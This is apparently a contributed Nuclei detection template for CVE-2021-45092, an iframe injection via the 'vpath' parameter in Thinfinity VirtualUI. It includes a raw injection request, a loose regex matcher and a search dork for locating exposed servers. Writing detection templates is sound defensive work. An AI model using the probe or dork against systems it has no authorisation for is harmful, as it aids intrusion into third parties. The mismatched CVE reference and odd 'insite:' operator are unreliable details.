CVE-2021-45092 - Improper access control allows iframe external endpoints

[danielmofer]

Template Information:

CVE-2021-45092: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.

Reference

• https://www.tenable.com/cve/CVE-2021-45092
• Vulnerability - Improper Access Control cybelesoft/virtualui#2

Nuclei Template:

id: CVE-2021-45092

info:
  name: Iframe functionallity
  author: danielmofer
  severity: medium
  description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
  reference:
    - https://github.com/cybelesoft/virtualui/issues/2
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44848
    - https://www.tenable.com/cve/CVE-2021-45092
  tags: cve,cve2021,misconfiguration

requests:
  - raw:
      - |
        GET /lab.html?vpath=//wikipedia.com HTTP/1.1
        Host: {{Hostname}}
    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - ".*vpath.*"
        part: body

Example of the response:

[2021-12-12 00:00:00] [CVE-2021-45092] [http] [medium] http://example.com/lab.html?vpath=//wikipedia.com

To test it you can use the Google Dork: insite:"Thinfinity VirtualUI"